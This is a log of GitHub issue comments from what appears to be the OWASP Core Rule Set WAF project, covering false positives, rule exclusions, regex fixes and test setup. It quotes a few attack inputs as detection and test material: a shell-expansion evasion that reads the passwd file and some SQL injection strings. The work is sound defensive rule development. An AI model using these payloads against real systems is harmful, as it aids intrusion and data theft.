In order to avoid repeating ourselves, we ought to prepare a few canned responses that address 80-90% of the new issues.

Open question: What responses do we need?

- FP: Please provide missing information
- FP: Won't fix due to higher PL, please help yourself with a RE
- FP: Won't fix due to problem with libinjection beyond our reach, please help yourself with a RE
- FP: Have you activated rule e

[2021-09-02 11:44] dune73 commented on #2179
Awesome writeup and discussion.

[2021-09-03 12:36] dune73 commented on #2176
Thank you. You have the rule exclusion enabled.

Unless I am not mistaken, this is a known false positive is covered by rule 9003106, which has not been released yet.

(Here is the PR from last autum: https://github.com/coreruleset/coreruleset/commit/4a495faba13dd2b48e6346406f705059a122e5fe)

I suggest you ask your hoster to deploy the new rule 9003106 or you deploy it yourself while we prepare ou

[2021-09-03 12:36] #2176 closed

[2021-09-03 12:38] dune73 commented on #2171
Thank you for reporting @Kendokai. This is highly welcome since we get very few report about non-Western language false positive. Can you tell me more about your setup and could you provide a full curl call that triggers this rule (see above)?

[2021-09-03 12:40] dune73 commented on #2170
We have not heard from @lifeforms, but I am strongly in favor of 941101 at PL2.

If we do not hear other opinions, somebody could provide a PR, or you add it to the agenda for Monday or the issue chat in two weeks.

[2021-09-03 12:41] dune73 commented on #2167
So what do we do here. Add all this to the WP RE package?

[2021-09-03 12:44] dune73 commented on #2166
I like your solutions and I agree that more is tough.

[2021-09-03 12:45] dune73 commented on #2150
Any update here @diegaless?

[2021-09-03 12:51] #2145 closed

[2021-09-03 12:57] dune73 commented on #2142
Thank you for your support with testing this so intensively, @mackov83.

@azurit : Are you planning to provide a PR here, or should we look for a different volunteer?

[2021-09-03 13:00] dune73 commented on #2140
I'm losing track a bit here, but AFAICS, we don't have a PR for this, so far?

Please correct me if I'm wrong.

[2021-09-03 13:01] dune73 commented on #2139
Thanks for volunteering, @franbuehler.

Do you have a timeline for the PR?

[2021-09-03 13:05] azurit commented on #2142
Sorry, i was planning to get back to this.

I need to test solution (https://github.com/coreruleset/coreruleset/issues/2142#issuecomment-870534060) from @lifeforms because it should work (but it wasn't for @mackov83 ).

[2021-09-03 13:08] theMiddleBlue commented on #2166
maybe we need to look for `${}` too, otherwise, it could be bypassed by using prefix or suffix pattern in bash/dash. Something like:
`more ${PATH:0:1}etc${PATH:0:1}passwd`

[2021-09-03 13:09] dune73 commented on #2118
OK, no responses to the tweet and nothing substantial to confirm the idea the regex is correct. Thank you for your alternative proposal @RedXanadu.

So I guess it's time for your fix / PR @NiceYouKnow. Thank you for your support.

[2021-09-03 13:11] dune73 commented on #2142
Nothing to be sorry for. But good to hear you are committed to this problem. I'm co-assigning you.

@lifeforms, if you want, feel free to unassign yourself, we have a new volunteer. :)

[2021-09-03 13:13] dune73 commented on #2109
ping @lifeforms / @theseion

[2021-09-03 13:18] dune73 commented on #2166
On the bright side, rule 931130 is being triggered by this payload.

[code]

The minium to trigger 931130 is
[code]

[2021-09-03 13:20] dune73 commented on #2071
Ping @lifeforms

[2021-09-03 13:28] dune73 commented on #2034
Thank you for looking into this @fzipi.

I am not quite sure I follow you. So you think the existing functionality you demonstrated at the URI linked is overly limited and you propose we write our own action.

Questions:
* Is it too limited or good enough from your perspective. From my perspective it might just be good enough.
* Can we write our own github action to run this? Complicated? How to r

[2021-09-03 13:30] dune73 commented on #1999
Status: This is clearly on my turf and I am postponing this constantly while life interferes. Sorry. Yet I am none the wise and can not give a clear date, I'm behind on many fronts.

[2021-09-03 13:31] dune73 commented on #1991
Any status update, @fzipi?

Also: I guess we need a volunteer for the
* Add Windows triple dot to a PL1 rule
* New PL2/3 rule that catches the mail injections quoted above

[2021-09-03 13:36] RedXanadu commented on #2140
@dune73 I think this specific false negative has been fixed, with a new test also added, in #2178

I believe this issue can be closed now

[2021-09-03 13:42] dune73 commented on #2140
Thank you. I suspected as much and overlooked your link to this issue in the PR message for #2178. Closing now.

[2021-09-03 13:42] #2140 closed

[2021-09-03 13:46] dune73 commented on #1912
@azurit: Do you have an opinion here? If I read you correctly, the FPs you are getting are principally due to `phpinfo()` triggering this. If we could avoid that and maybe also adopt the easier proposals by @lifeforms, would you then be satisfied?

[2021-09-03 13:47] dune73 commented on #1874
Any update here @airween?

[2021-09-03 13:50] dune73 commented on #1867
I guess we won't be hearing anything from @csanders-git about this anymore.

Unassigning him and adding the "good first issue" label.

All we need is a PR that moves rule 941120 from PL1 to PL2.

[2021-09-03 13:56] dune73 commented on #1866
Are you guys OK with adding the tags yourself, or do you really think we need one per rule?

Existing drawbacks:
* You can issue a remove rule by ID, even if there is a bug with this in ModSec3. But a fix has been merged for 3.1.0
* We are reluctant to add more tags, since they eat into the alert message space and can lead to tags being eaten and corrupt alert messages

A workaround is apparently

[2021-09-03 14:12] airween commented on #1874
Not yet. I hope I can focus to that in this month.

[2021-09-03 14:25] dune73 commented on #1874
Thank you.

[2021-09-03 14:25] azurit commented on #1866
It's not a killer feature for me, so..

[2021-09-03 14:26] theMiddleBlue commented on #1866
if the v3 bug has been fixed on 3.1.0, this could be closed

[2021-09-03 14:43] dune73 commented on #1866
Thank you very much for your prompt response. Much appreciated you can live without these new tags. Closing this.

[2021-09-03 14:43] #1866 closed

[2021-09-03 15:22] fzipi commented on #2034
Well, we can get the files, but we will always get the additional zip and targz files of the commits in master.

So my vote will be for just publishing what we have in master for nightly.

We can write our own github action, of course, but need to review the API to see if we can do a release that doesn't include the default files or something like that. This will take additional time.

[2021-09-03 15:25] dune73 commented on #2034
Hold on, when we do the nightly builds as you propose, we get a new commit with a zip blob every night?

Still not understanding this properly.

How much time for the basic setup you propose?

[2021-09-03 15:29] fzipi commented on #2034
You get one nightly every day, yes.

The basic setup, 5-10 minutes, and one merge.

[2021-09-03 15:41] dune73 commented on #2034
An automatic commit with an update to an file in the main branch every night is a no-go, I think.

[2021-09-03 15:46] fzipi commented on #2034
Let's try again. I'm not explaining myself correctly 😄

- to do this, we need to run a new github action every day
- the action basically creates a new instance of a release, called "nightly"
- will take whatever has reached the "master" branch "v3.4/dev", create a new zip and tar.gz file, and add it to the release
- there will be only one pair of files in the release
- nothing is commited to the

[2021-09-03 15:52] dune73 commented on #2034
OK. Thank you. Sounds much better than what I misunderstood.

But the nightly builds always have the same name / file names and they will clog the release / tags view with a new entry every day?

If not, it's a no-brainer, I think. Running with a stable file name for nightly builds seems pretty standard for me.

[2021-09-03 16:02] fzipi commented on #2034
Yes, they will overwrite the last one. I think you can have the last X releases around, but need to double check.

For me, this will be an way for downstream providers to have a quick curl and script their tests, instead of waiting for a release. But they can do the same using just git. It is just "nice to have".

[2021-09-03 16:25] skwokie commented on #2145
Thanks so much for your help!

[2021-09-03 16:54] dune73 commented on #2145
You're most welcome.

[2021-09-04 02:21] diegaless commented on #2150
Sorry for the delay and thank you for your work. Let me know once you have obtained the text of the post to edit and delete those parts of my comment.

Excerpt from the text that I believe was the cause of the rule jump

 No se podía sugerir probar las cosas en otro gestor, ya que UNICAMENTE lo hacen en Oracle, lo que nos deja MySQL/MariaDB, SQL Server y PostGreSQL sin ser mencionados siquiera en

[2021-09-05 06:45] theseion commented on #1785
We need to look at this again for two reasons:
1. I don't think we can assume that `==\b` is equivalent (tokenization doesn't require a whitespace because there are usually no keywords that include `=`)
2. The transformation instructions of the rule have changed; the are now `t:none,t:cmdLine` (see https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/590). Because of this the `+` could potenti

[2021-09-05 06:47] theseion commented on #2109
Still working on other stuff and waiting for a response to my proposal.

[2021-09-05 07:58] theseion commented on #2118
I just spent some time with this too. The longer I look at it the more it seems to me that the expression contains at least one typo. For the expression to match there must be an engine accepting something like `AND =` which doesn't make sense because there is no left hand side to the `=`. Unless there existed a "boolean compound assignment" somewhere (e.g. `x := y AND= z`).

While the idea of com

[2021-09-06 12:38] azurit commented on #1912
I think most of the FPs are generated by pattern `Warning.*sybase.*` so maybe this would be sufficient.

[2021-09-06 13:26] azurit commented on #2150
Here is the exact match against pattern `PostgreSQL.*ERROR`:
`PostGreSQL sin ser mencionados siquiera en clase. No digo ya formarnos en profundidad en ellosĂ˘Â€Â¦ Mencionarlos o FormaciĂÂłn orientada ĂÂşnica y exclusivamente a comandos de Cisco en PAR, el 80% del curso fueron comandos de Cisco, incluidos exĂÂˇmenes y el resto, gracias a dios subnetting, peroĂ˘Â€Â¦ No se vio NADA de IPv6, nada Ă

[2021-09-06 14:16] theseion commented on #1785
I just ran the test and, indeed, the removal of `t:urlDecodeUni` fixes the FP for the line you posted above.

I'll add the test against the FP so we'll notice should we make a change to the transformation functions.

[2021-09-06 15:54] #1785 closed

[2021-09-06 16:20] lifeforms commented on #2150
This is a great example input.

I have no experience with PostgreSQL, I briefly installed PostgreSQL and tried the [basic example](https://www.php.net/manual/en/pgsql.examples-basic.php). Some errors that I got out of it are:

[code]

So it seems `ERROR` or `PostgreSQL` are not always there. I'm wondering therefore if this pattern is still really effective.

Maybe we should search for `(?:pg_query

[2021-09-06 16:45] lifeforms commented on #2071
Addressed this in PR #2192. I'd like to keep the changes as small as possible to move forward on this, we can always perfect the rule later. For further discussion please visit #2192.

[2021-09-06 16:45] #2071 closed

[2021-09-06 16:46] lifeforms commented on #1912
Something like that would work. Maybe we can be generous and give a bit more chars, like `{2-20}` to be on the safe side.

[2021-09-06 18:29] dune73 commented on #2185
# Decisions

## PRs

[2021-09-08 09:32] dune73 opened #2197 "Monthly Chat Agenda October 2021 (2021-10-04 and 2021-10-18)"
This is the Agenda for the Monthly CRS Chat.

The general chat is going to happen on https://owasp.slack.com in the channel #coreruleset on Monday, 2021-10-04, at 20:30 CET. That's the 1st Monday of the month. A separate issue chat is happening at the same location, same time on Monday, 2021-10-18. That's the 3rd Monday of the month. Please note that we have a [CRS calendar](https://calendar.googl

[2021-09-10 07:42] #2118 closed

[2021-09-10 10:07] ChuongTran97 opened #2198 "something went wrong when i add new content-type to rule 900220"
### Description
i added new content-type (application/scim+json) to rule 900220 and uncomment this rule. But when i use this content-type in my request and Modsecurity block me. I get this log:

ModSecurity: Warning. Matched "Operator `Rx' with parameter `^application/scim+json|application/x-www-form-urlencoded|multipart/form-data|text/xml|application/xml|application/soap+xml|application/x-amf|app

[2021-09-10 11:49] airween commented on #2198
Hi @ChuongTran97,

thank you for your report.

Can you provide a `curl` request and your modification to emulate this issue?

I switched back in my test environment to CRS 3.2 (3.2.1), activated the rule [900220](https://github.com/coreruleset/coreruleset/blob/v3.2/master/crs-setup.conf.example#L396-L402) and inserted your CT:

[code]

Please note, that I've used `application/scim\+json` instead o

[2021-09-10 20:40] RedXanadu opened #2199 "DokuWiki Content-Type rule exclusion uses old format for variable"
### Describe the bug

Rule 9004110 from the DokuWiki rule exclusion file amends the variable `tx.allowed_request_content_type`.

The rule currently uses the old style format for that variable, e.g. `application/foo|application/bar|...`

The style used for that variable was changed in CRS v3.3.0 to `|application/foo| |application/bar| ...`

### Steps to reproduce

Observe how rule 9004110 currently

[2021-09-10 20:51] RedXanadu commented on #2199
I believe PR #2200 will resolve this issue

[2021-09-11 04:35] ChuongTran97 commented on #2198
I used your configuration and it work. My problem was solved Thank you very much.

[2021-09-11 04:35] #2198 closed

[2021-09-12 18:07] RedXanadu commented on #2179
@fzipi Ah-hah, yes! The rule includes `t:urlDecodeUni`, so that makes a lot of sense :)

Using that to test, I can confirm that there is a difference.

---

The `modsec3-nginx` container matches on the following string (no actual null character, just the characters `\x00`):

Submitted payload:
`' or 1=1;\x00`

[code]

I believe this is incorrect and _should not match_.

The `modsec2-apache` contai

[2021-09-12 22:09] fzipi commented on #2179
First, I just can't stress enough how good your tests have been. This is really awesome.

I agree that it is exactly what I would expect from this, and that this fixes the behavior as intended.

[2021-09-13 19:13] RedXanadu commented on #2179
@fzipi Thank you :)

I've opened #2201 which I believe addresses the regex pattern issue discussed above

[2021-09-13 19:52] RedXanadu commented on #2179
Have added a new regression test to the PR: test that the input `' or 1=1;%00` is correctly caught

[2021-09-18 07:44] leyao-daily opened #2203 "A single file that inculde all the owasp rules for modsecurity"
I am wondering if there is a file or strings that include all the rules.
I want to load all the rules once using `modsec_rules_->load(rules_strings)` and define the rules_string as hardcode.

[2021-09-18 08:36] airween commented on #2203
Hi @leyao-daily,

sorry to say, but your issue is a bit incomplete (and I'm not sure this is a CRS issue).

Is your mentioned method comes from libmodsecurity3's [load](https://github.com/SpiderLabs/ModSecurity/blob/v3/master/src/rules_set.cc#L66-L83) method?

If yes, you can make a trick:

[code]
Then you should use the file `/pat/to/your/hardcoded.conf` as hardcoded `rules_strings`.

Btw I think

[2021-09-18 09:06] leyao-daily commented on #2203
Thanks for your reply.
And what I want is to avoid reading a file system. I want define the eg.
`rules_strings = SecRuleEngine On
                    SecAuditEngine On
                    SecAuditLogType Serial
                    SecAuditLog /etc/modsecurity_audit.log
                    SecRequestBodyAccess On
                    SecResponseBodyAccess On
                    SecRule ARGS:param1 "

[2021-09-18 09:49] airween commented on #2203
Sorry, looks like `->load()` does this. The file handler method is `loadFromUri()`.

So you just want to concatenate the all rules and paste the result to your source?

Then you should try:

[code]
and you will get the file `/tmp/modsec.conf`.

Btw I'm not sure that will work, because there are several external resources what CRS rules use, see the data files in [this](https://github.com/corerules

[2021-09-18 15:18] lifeforms commented on #2199
#2200 is looking good and has been merged in the development tree, thank you!

[2021-09-18 15:18] #2199 closed

[2021-09-18 15:32] lifeforms commented on #2167
In my opinion we should expand the scope of the WordPress package to bring in often-used plugins.

Plugins that we often use at work are: Advanced Custom Fields, Gravity Forms, WooCommerce, WPML (multi language). We have made proprietary exclusions for them, but they may need some polish to include them in CRS.

A good task for me during the CRS retreat?

[2021-09-18 15:50] lifeforms commented on #2170
I have a vague recollection that years back I tried to add REQUEST_FILENAME to some XSS rules, and ultimately had to revert those changes because of many false positives, but I am not completely sure anymore. I am may be confusing it with a different scenario (we also had lots of trouble with XSS rules on the Referrer header which caused some reverts). I am trying desperately to find my old notes,

[2021-09-18 16:00] lifeforms commented on #2044
I tried an approach which was not fruitful and I have to dig into it more. Thanks for your patience.

[2021-09-18 17:40] firasd commented on #2167
I'd just like to underscore that PUT is a method used by WP-JSON (which is the URL for the WP API) in general.

So blocking all HTTP PUT requests (as mod_sec seems to do) is not really an Elementor problem per se, it will be a problem for anyone trying to use the WP API

[2021-09-18 18:40] lifeforms commented on #2167
The WordPress exclusion package could selectively allow PUT just on the necessary endpoints.

[2021-09-19 12:11] fzipi commented on #2187
I think we can start with these, that will cover probably 90% of the responses.

[2021-09-19 16:28] dune73 commented on #2167
I think the expansion makes sense, but I am not sure it's a good task for the retreat. It's something that does not need a focused group of developers (unless we want to give the RE package a huge boost, yet if that's the case, I'd like to see a commitment from the WP community).

[2021-09-19 16:31] dune73 commented on #2150
@Azurit: this issue is assigned to you. Are you still interested to provide a fix? I was a bit weary first, but I think all we need is now on the table. What do you think?

[2021-09-19 16:37] dune73 opened #2205 "Add Windows triple dot to a PL1 rule"
### Description

Windows triple dot is a path traversal that we do not detect. See #1991.

I's probably best to add this to an existing rule.

[2021-09-19 16:39] dune73 opened #2206 "New PL2/3 rule that catches mail (SMTP) injections"
### Description

CRS lacks a rule that detects SMTP protocol.

See #1991.

[2021-09-19 16:40] azurit commented on #2150
@dune73: Yes, i am.

[2021-09-19 16:40] dune73 commented on #1991
The fuzzing is a separate idea. But I have opened two new issues that replace this issues. I'm thus closing this.

* #2205
* #2206

[2021-09-19 16:40] #1991 closed

[2021-09-19 16:47] dune73 commented on #2203
Does this address your needs @leyao-daily? If yes, please close the issue.

[2021-09-19 16:49] dune73 commented on #2150
Cool. Is there anything you need, or are you good to go?

[2021-09-19 16:50] azurit commented on #2150
I think there's everything.

[2021-09-19 17:35] dune73 commented on #2034
Do you have a status update here @fzipi?

[2021-09-19 17:36] dune73 commented on #1912
Sounds like a plan to me. Next step PR?

[2021-09-19 20:34] dune73 commented on #2150
Cool. Thank you for the confirmation.

[2021-09-19 22:41] fzipi commented on #2034
Yes @dune73. Added PR and can be merged anytime.

[2021-09-20 11:10] azurit commented on #2150
@lifeforms I'm thinking about how to integrate check for `SQLSTATE` - should it be rule similar to `951100`? i.e. it will activate `tx.sql_error_match`. Or maybe just adding `SQLSTATE[` into `sql-errors.data`? Would be easy-go but what about FPs, as `@pm` is case-insensitive?

[2021-09-20 19:11] franbuehler commented on #2171
Maybe this problem was already solved by https://github.com/coreruleset/coreruleset/pull/2107.
I'll try to reproduce and test the false positives against the fix.

[2021-09-20 19:18] RedXanadu commented on #2170
Note to self: re-read full issue, create PR, maybe also test case.

[2021-09-20 20:01] dune73 commented on #2179
Issue covered in the [September issue chat](https://github.com/coreruleset/coreruleset/issues/2185#issuecomment-913804183).

The issue should be solved via PRs #2183 and #2201. We're keeping the issue open while the PRs are being tested.

[2021-09-20 20:02] dune73 commented on #2142
Issue covered in the [September issue chat](https://github.com/coreruleset/coreruleset/issues/2185#issuecomment-913804183).

@lifeforms will do a PR to address the PUT problem.

[2021-09-20 20:02] dune73 commented on #1943
Issue covered in the [September issue chat](https://github.com/coreruleset/coreruleset/issues/2185#issuecomment-913804183).

@theseion volunteered to take a look.

[2021-09-20 20:03] dune73 commented on #2166
Issue covered in the [September issue chat](https://github.com/coreruleset/coreruleset/issues/2185#issuecomment-913804183).

@lifeforms is in the best position to solve this. It's just that his plate is very full. So this may take some time...

[2021-09-20 20:04] dune73 commented on #2170
Issue covered in the [September issue chat](https://github.com/coreruleset/coreruleset/issues/2185#issuecomment-913804183).

@RedXanadu volunteered to do a PR. @lifeforms would like to get a ping then so he can test the PR in production and it's also a candidate for our incubator plugin where we want to test rules before we adopt them into the mainline.

[2021-09-20 20:05] dune73 commented on #2171
Issue covered in the [September issue chat](https://github.com/coreruleset/coreruleset/issues/2185#issuecomment-913804183).

@franbuehler volunteered to check if this is indeed already solved, including the Russian and Khmer findings.

[2021-09-20 20:06] dune73 commented on #2187
Issue covered in the [September issue chat](https://github.com/coreruleset/coreruleset/issues/2185#issuecomment-913804183).

@theseion volunteered to come up with a few drafts. @dune73 will refine and finish the texts afterwards.

[2021-09-20 20:07] dune73 commented on #2167
Issue covered in the [September issue chat](https://github.com/coreruleset/coreruleset/issues/2185#issuecomment-913804183).

@lifeforms will do a PR to address the PUT problem. The expansion idea comes afterwards.

[2021-09-20 20:08] #2185 closed

[2021-09-21 05:32] Kendokai commented on #2171
@dune73
ModSecurity version:  Version 3.2.0 - 2019-09-24

`--73997253-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--73997253-H--
Message: Warning. Pattern match "[\\xbc\\xbe].*[\\xbc\\xbe>]|[\\xbc\\xbe<].*[\\xbc\\xbe]" at ARGS:model[description]. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/

[2021-09-22 01:22] leyao-daily commented on #2203
I would like to have a try. Thanks!!

[2021-09-22 01:22] #2203 closed

[2021-09-22 06:41] dune73 commented on #2203
You're most welcome.

[2021-09-22 08:14] dune73 commented on #2171
Thank you @Kendokai.

[2021-09-23 20:42] braianxde opened #2209 "ctl:ruleRemoveTargetById with range don't work with ARGS"
### Describe the bug

When i put a rule with ctl:ruleRemoveTargetById range, the rules still blocking for the ARGS.

### Steps to reproduce

With a rule

SecRule REQUEST_URI "URL" \
     "id:2009,\
     nolog,\
     phase:1,\
     pass,\
     ctl:ruleRemoveTargetById=941100-941950;ARGS:testwaf"

Make a request with a param called testwaf with this value:

%3Cdiv%3E%3Cp%3E%3Cb%3E%3Cfont%2Bcolor%3D%

[2021-09-23 20:59] fzipi commented on #2209
Hi @braianxde! Can you add which rules are matching?

[2021-09-23 21:01] braianxde commented on #2209
941100
941110
941160
949110

[2021-09-24 05:11] dune73 commented on #2209
Hello @braianxde, your rule exclusion is supposed to be placed __before__ the CRS include. Could you please check and confirm?

[2021-09-24 10:57] braianxde commented on #2209
Hey @dune73

i have a main.conf, and this is the order of includes:

Include /usr/local/se/apps/nginx/modsec/modsecurity.conf
Include /usr/local/se/apps/nginx/modsec/owasp-modsecurity-crs/crs-setup.conf
Include /usr/local/se/waf_rules/waf_whitelist.conf    <- Here is my rule
Include /usr/local/se/apps/nginx/modsec/owasp-modsecurity-crs/rules/*.conf  <-default rules

[2021-09-24 12:29] fzipi commented on #2209
@braianxde Just to confirm: are you POSTing that, right? Or using GET?

[2021-09-24 12:55] braianxde commented on #2209
Yeah, i'm using post!

[2021-09-24 13:14] fzipi commented on #2209
Ah, there is your problem then.

Please change the phase in your rule to `phase:2`. Otherwise, args in the message body are not checked.

[2021-09-24 13:21] fzipi commented on #2209
Another clue you should looks in your logs is the matching phase: there it should probably say `phase:2`.

[2021-09-24 13:27] braianxde commented on #2209
Ok! thanks for the explanation!

I changed the phase, and reload the nginx and the requisition still being blocking, but now it was blocked for only 3 rules:

941110
941160
949110

[2021-09-24 13:34] fzipi commented on #2209
Ok, next question: I don't see anything in the docs saying that `ctl:ruleRemoveTargetById` can do ranges. Are you sure you are applying it properly?

You can create a list using `ctl:ruleRemoveTargetById=941110;ARGS:testwaf,ctl:ruleRemoveTargetById=941160;ARGS:testwaf`. Don't remove the 949110, because that's the evaluation rule at the end.

[2021-09-24 13:40] braianxde commented on #2209
i found this issue solved and i think that with it in code, the ranges was to be accepted.

https://github.com/SpiderLabs/ModSecurity/issues/2110

[2021-09-24 14:09] fzipi commented on #2209
Thanks for the link. So it should be supported. If it keeps failing, can you paste your whole log sanitized for this example?

[2021-09-24 14:17] braianxde commented on #2209
Sure!

`---zNrwMGQQ---A--
[24/Sep/2021:10:21:06 -0300] 1632489666 172.20.0.1 48528 172.20.0.5 443
---zNrwMGQQ---B--
GET /se/v19666/form/efms_exec_html/form_application_action.php?action=1&fgread=0&oidrevisionform=2c9580857c0814df017c0826cec30205&oidentityreg&fgapplication=seform&caption=Formul%C3%A1rio&callFunctionAfterSaveForm=1&type=2 HTTP/2.0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64

[2021-09-24 14:33] fzipi commented on #2209
Dumb comment here: your arg in the rule is called `testwaf`, and here it is matching `testEwaf`. Do they match?

[2021-09-24 14:46] dune73 commented on #2209
For the record: This is irrelevant for rule exclusions. Ctl statements don't care whether an argument exists or not, they simply remove the argument name from the target list of a rule. `SecRule ARGS`  becomes `SecRule ARGS|!ARGS:testwaf`.

Ranges work just fine in this situation with ModSec 2.9 on Apache.

I've tried out your rule exclusion on that platform and it worked fine.

Could you please c

[2021-09-24 14:56] braianxde commented on #2209
My configuration is using ModSec3 and for the webserver we use Tomcat 3.x (I mixed up)

[2021-09-24 16:54] posita commented on #2176
I have been _**told**_ (no way to confirm) that my hosting provider has enabled rule 9003106 for my account, but that hasn't helped. ModSecurity still fails, now here:

[code]

[2021-09-26 06:49] theseion opened #2210 "`regexp-assemble.pl` Converts a literal `\\x00` to a `null`"
`regexp-assemble.pl` Converts a literal `\\x00` to a `null` in the output. We expect the final expression to retain the literal.

Make sure this is true for the full range of bytes.

[2021-09-26 07:12] azurit commented on #2176
Looks like you don't have XML body processor enabled, please look at the rule `200000` in `modsecurity.conf`.

[2021-09-26 07:20] dune73 commented on #2176
Ah, good thinking, or the content-type is not set correctly, so rule 200000 does not identify it as XML.

[2021-09-26 13:28] posita commented on #2176
Hmmm…I have no control over setting the content type. The request is coming from OS X's `Calendar.app`.

[2021-09-26 14:28] dennismayr commented on #2142
This did the trick for me!

[2021-09-26 17:04] azurit commented on #2142
@dennismayr Thanks for getting back to us! Can you be so kind and test it also with this little change?
`phase:1,\`

[2021-09-26 17:10] dennismayr commented on #2142
It worked as well.

You may have nailed a good workaround.

[2021-09-26 21:19] airween commented on #1874
Hi @rednoah,

can you help me to reproduce this issue?

I reviewed your attached logs, but this part of the first line is a bit strange:
[code]
Looks like you send a request where the name of an argument is the file?

A `curl` example would be fine.

If I understand you correctly, there is no any connection between RoundCube webmail and this request, right?

[2021-09-27 01:42] rednoah commented on #1874
It's been a long time, but I'm pretty sure it was something simple like this:
[code]
Just posting a text file directly, not form-encoded.

The signed message text would have been generated with `gpg --clearsign` but as I remember it wasn't always blocked, presumably because the random digital signature part just sometimes matched something that pushed the score over the limit.
https://www.gnupg.or

[2021-09-27 05:37] airween commented on #1874
Thanks @rednoah,

okay, I got it. Now I can take a look this issue.

[2021-09-27 11:42] gudmundurp opened #2211 "Drop keyword not blocked for SQL injection"
### Description

The following query is not blocked:

https://some.web.site/index.html?q='drop table users;--

But it is blocked if I replace drop with delete, update, etc. This feels inconsistent, so I thought I should report it just in case.

Interestingly, if I add a ";" character after the single quote, then it is blocked:

https://some.web.site/index.html?q='; drop table users;--

### Your En

[2021-09-27 19:40] airween commented on #1874
Hi @rednoah,

thanks again for the quick `curl` tip, I could reproduce your issue.

I think these are not false positives, the engine with the rule set does what it has to do.

You didn't mention what CRS version you are using, so in my dev environment I checked your request against v3.4/dev. This is just relevant because the links below have generated based on this version's URL's. [This](https:/

[2021-09-28 00:55] mac-chaffee opened #2212 "Google OAuth redirects still being blocked due to ".profile""
### Description

This is a resurfacing of Issue #1451 where a valid google oauth redirect gets blocked because it thinks you're trying to read from the ".profile" OS File.

A rule was implemented to try to detect google oauth and allow it: https://github.com/coreruleset/coreruleset/blob/cebc7fdd6c54c2b988b72c4362fc15cb2686cde0/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf#L24

But it seems to be t

[2021-09-28 06:17] azurit commented on #2212
Hi @mac-chaffee,
thanks for reporting this! Your 'score' parameter seems to be invalid, from Google OAuth documentation ( https://developers.google.com/identity/protocols/oauth2/web-server ):

[code]

Can you recheck it?

I will look at the additional parameters.

[2021-09-28 19:47] theseion commented on #2210
I have a solution. Unfortunately, the solution requires patching Regexp::Assemble. I've forked the repository and made the required change but I'm still struggling with a good way to use the patched module (since it will not be on CPAN).

[2021-09-29 00:54] mac-chaffee commented on #2212
I think that scope parameter is actually generated by Google themselves. That URL is where my browser gets redirected to after completing the Google login process.

The process goes like this:

1. User visits mysite.com and clicks "login with google", which takes them to mysite.com/accounts/google/login
2. User receives a 302 redirect to `https://accounts.google.com/o/oauth2/auth?client_id=••••.ap

[2021-09-30 02:47] #2139 closed

[2021-10-03 10:26] theseion commented on #2187
# missing info
Hi! Thanks for submitting this issue.

Unfortunately, you did not include enough information for us to actually help you. Please provide the following if possible:
- audit log extract
- web server and version
- ModSecurity connector version
- CRS version

# won't fix higher PL
Hi! Thanks for submitting this issue.

Unfortunately, we cannot help you. With the few resources we have we

[2021-10-03 12:53] theseion commented on #1943
For reference, these are the characters in the expression:
\x0B: \v
\x09: \t
\x0C: form feed
\x3B: ;
\x2C: ,
\x28: (
\x3B: ;

The expression could be improved too, by removing the doubled `\x3B`.

[2021-10-03 13:13] theseion commented on #1943
I cannot reproduce this, not with Apache or NGiNX. After having spent some time trying to find a sequence of conversions that would lead to this it looks like there's maybe something fishy going on with the encoding of the web server. The "Matched Data" (`#?>B@51;ONB =0@:>B8:8`) looks similar to the US-ASCII XSS attack, where the 8-bit bytes are converted to 7-bit bytes, but it doesn't seem to wor

[2021-10-03 13:30] theseion opened #2216 "Locally failing tests on modsec3-nginx"
Running tests for 941120 against modsec3-nginx fails for me locally (they don't fail against modec2-apache). The tests expect to see log entries that don't appear to be found, however, looking at the logs the entries are clearly there. Maybe the test is looking at the wrong logs?

* CRS version (e.g., v3.4/dev):
* Operating System and version: macOS 14

[2021-10-03 15:34] airween commented on #2216
[941120](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml) has 4 tests - all of them are failed?

Other test cases are fine?

With which test framework do you use? [go-ftw](https://github.com/fzipi/go-ftw) or [ftw](https://github.com/coreruleset/ftw)?

[2021-10-03 15:45] theseion commented on #2216
The first two fail because they expect the ID to be in the log. The other two succeed because they expect no ID in the log.

The same applies to other tests. Whenever the ID is expected to be in the log, the test fails. This is using ftw.

It's probably something related to my setup but I wanted to check if I'm the only one who has this problem first.

BTW, should I even invest time in this? Or is

[2021-10-03 16:07] airween commented on #2216
If the entry is there (in the log), but `ftw` does not find that, it could be some timezone issue on your system. Check that Nginx produces the logs with correct hour, what your system uses.

[2021-10-03 21:27] fzipi commented on #2216
@theseion I've been using go-ftw since a long time, and it works all the time for me. But of course I'm cheating because I'm the author. Sometimes, depending on the type of execution you are doing (container vs. base host), you need to check the timezone.

Go-ftw will fail because the timezone can't be detected properly and you will see that all log related tests fail (like this case). The typical

[2021-10-04 06:21] theseion commented on #2216
Thanks guys. You seem to be on the right track. The timezone wasn't correct (why doesn't this happen in the modesec2-apache container?). However, `TZ` isn't set in my shell (and usually isn't), so it can't be picked up that way. Setting `TZ` manually helped to fix the timestamps in the logs. However, the tests still don't work.

I noticed that the container printed a warning (which I had missed...

[2021-10-04 08:07] airween commented on #1874
Hi @rednoah,

did this solve your problem? If yes, pleas close this issue.

[2021-10-04 11:07] azurit commented on #2150
@lifeforms ping :)

[2021-10-04 12:03] azurit commented on #2211
Hi @gudmundurp, thanks for reporting this! And sorry for the delay.

[2021-10-04 18:42] franbuehler commented on #2197
# Decisions

## PRs

* #2215 - review needed
* #2208 - tests are failing and we do not know why
* #2201 - tests are failing and we do not know why
* #2207 - nightly builds almost ready
* #2183 - we need to discuss this, also the failing tests
* #2163 - need for a discussion
* #2149 - ready to be merged after conflicts are resolved
* #2101 - broetli woes
* #2050 - tests failing, otherwise, this mig

[2021-10-04 19:01] theseion commented on #2216
Ok... found it...

To use `modsec3-nginx` in tests, I had to use the `--config` for the test script. I had never noticed that existed before...

[2021-10-04 19:01] #2216 closed

[2021-10-04 19:09] #2034 closed

[2021-10-05 08:31] azurit commented on #2212
Can you try with this regex?
`^(?:email|profile|openid)(?: email| profile| openid| https:\/\/www\.googleapis\.com\/auth\/userinfo\.(?:email|profile|openid))+$`

